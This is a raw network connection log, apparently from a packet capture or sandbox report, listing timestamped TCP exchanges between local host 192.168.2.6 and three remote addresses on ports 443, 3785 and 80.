Dec 10, 2024 08:57:28.322438955 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.322511911 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.325655937 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.325735092 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.329647064 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.329727888 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.332777977 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.332865953 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.335936069 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.336009026 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.340042114 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.340112925 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.343378067 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.343456984 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.346803904 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.346892118 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.349998951 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.350086927 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.353178978 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.353256941 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.356453896 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.356517076 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.360390902 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.360491037 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.363532066 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.363609076 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.366692066 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.366756916 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.507297993 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.507386923 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.509763002 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.509835958 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.513865948 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.513951063 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.517083883 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.517143965 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.520344019 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.520391941 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.524251938 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.524318933 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.527395010 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.527463913 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.530616999 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.530689001 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.533732891 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.533792019 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.537801027 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.537863970 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.540580988 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.540684938 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.545207024 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.545280933 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.546338081 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.546390057 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.546411037 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.546427011 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:28.546452999 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.546483994 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.787614107 CET	49712	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:28.787628889 CET	443	49712	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:29.752944946 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:57:29.872320890 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:57:29.872385025 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:57:30.139292002 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:57:30.258487940 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:57:31.086368084 CET	49729	80	192.168.2.6	104.26.0.231
Dec 10, 2024 08:57:31.111624002 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:57:31.114762068 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:57:31.205791950 CET	80	49729	104.26.0.231	192.168.2.6
Dec 10, 2024 08:57:31.205898046 CET	49729	80	192.168.2.6	104.26.0.231
Dec 10, 2024 08:57:31.210863113 CET	49729	80	192.168.2.6	104.26.0.231
Dec 10, 2024 08:57:31.234031916 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:57:31.330190897 CET	80	49729	104.26.0.231	192.168.2.6
Dec 10, 2024 08:57:31.505871058 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:57:31.506215096 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:57:31.625535965 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:57:32.446407080 CET	80	49729	104.26.0.231	192.168.2.6
Dec 10, 2024 08:57:32.446469069 CET	49729	80	192.168.2.6	104.26.0.231
Dec 10, 2024 08:58:20.568017960 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:20.687424898 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:30.170964956 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:30.290266991 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:31.992976904 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:32.113184929 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:32.192953110 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:32.293951035 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:32.312282085 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:32.394956112 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:32.413189888 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:32.494982958 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:32.514256954 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:32.595952988 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:32.614382029 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:32.695980072 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:32.715367079 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:32.796147108 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:32.815179110 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:32.896063089 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:32.915584087 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:32.996961117 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:33.015501022 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:33.099983931 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:33.116259098 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:33.200965881 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:33.219331026 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:33.320331097 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:33.353286982 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:33.472796917 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:33.763048887 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:33.863976955 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:33.882293940 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:33.963984966 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:33.983200073 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:34.064986944 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:34.083247900 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:34.164977074 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:34.184319019 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:34.265989065 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:34.284224033 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:34.365962982 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:34.385343075 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:34.466017962 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:34.485249043 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:34.566973925 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:34.585289001 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:34.667006969 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:34.686346054 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:34.768093109 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:34.786370039 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:34.868968010 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:34.887341022 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:34.972687960 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:34.988255024 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:35.069953918 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:35.091953039 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:35.169980049 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:35.189399958 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:35.270968914 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:35.289333105 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:35.371105909 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:35.390475988 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:35.471004009 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:35.490592003 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:35.572690964 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:35.590430975 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:35.676704884 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:35.692154884 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:35.773044109 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:35.796133995 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:35.873997927 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:35.892448902 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:35.975028038 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:35.993310928 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:36.075000048 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:36.094368935 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:36.174981117 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:36.194411993 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:36.276000977 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:36.294385910 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:36.375993013 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:36.395364046 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:36.476970911 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:36.495450974 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:36.577982903 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:36.596525908 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:36.677994013 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:36.697370052 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:36.778011084 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:36.797435045 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:36.879719973 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:36.897476912 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:36.979492903 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:36.999070883 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:37.080698967 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:37.098953962 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:37.180687904 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:37.200088978 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:37.278974056 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:37.301254034 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:37.379064083 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:37.398204088 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:37.479958057 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:37.498415947 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:37.579972982 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:37.599535942 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:37.679980040 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:37.699309111 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:37.784523964 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:37.799412966 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:37.881237030 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:37.903876066 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:37.982069969 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:38.000660896 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:38.091120005 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:38.101562023 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:38.191973925 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:38.210897923 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:38.291991949 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:38.311381102 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:38.393030882 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:38.411439896 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:38.493012905 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:38.512394905 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:38.593967915 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:38.612447023 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:38.695106983 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:38.713342905 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:38.794981003 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:38.814572096 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:38.898695946 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:38.914407969 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:38.998759031 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:39.018208027 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:39.095973969 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:39.118187904 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:39.196974993 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:39.216538906 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:39.298964024 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:39.317661047 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:39.401809931 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:39.418365955 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:39.502999067 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:39.521466970 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:39.603004932 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:39.622443914 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:39.706932068 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:39.722436905 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:39.804968119 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:39.826527119 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:39.906040907 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:39.924313068 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:40.007002115 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:40.025420904 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:40.107009888 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:40.126363993 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:40.206999063 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:40.226320982 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:40.307998896 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:40.326428890 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:40.408010960 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:40.427397013 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:40.508025885 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:40.527434111 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:40.609021902 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:40.633347988 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:40.710042000 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:40.728503942 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:40.811048031 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:40.829564095 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:40.914705038 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:40.930847883 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:41.014825106 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:41.035621881 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:41.114808083 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:41.135720968 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:41.212970972 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:41.240281105 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:41.314743042 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:41.334119081 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:41.414001942 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:41.434360027 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:41.514758110 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:41.533360958 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:41.618733883 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:41.634825945 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:41.714987040 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:41.738179922 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:41.816699028 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:41.834388018 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:41.915975094 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:41.936069012 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:42.017009020 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:42.035264969 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:42.117993116 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:42.136296988 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:42.219018936 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:42.237361908 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:42.319976091 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:42.338820934 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:42.419981956 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:42.439265013 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:42.519998074 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:42.540601015 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:42.621015072 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:42.639518023 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:42.721024990 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:42.740396976 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:42.824695110 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:42.840511084 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:42.924700022 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:42.944097042 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:43.024702072 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:43.044305086 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:43.124696016 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:43.144108057 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:43.224000931 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:43.244302988 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:43.324702024 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:43.343295097 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:43.428703070 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:43.444138050 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:43.524991989 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:43.548090935 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:43.628698111 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:43.644570112 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:43.728715897 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:43.748033047 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:43.826996088 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:43.848196030 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:43.926995039 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:43.946430922 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:44.028038025 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:44.046566963 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:44.128001928 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:44.147435904 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:44.228017092 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:44.247400999 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:44.328990936 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:44.347362041 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:44.429085016 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:44.448304892 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:44.529997110 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:44.548480988 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:44.631067038 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:44.649308920 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:44.732016087 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:44.750530005 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:44.833889961 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:44.851372004 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:44.934813976 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:44.953309059 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:45.035696983 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:58:45.054198980 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:58:45.133975983 CET	49723	3785	192.168.2.6	88.210.12.58
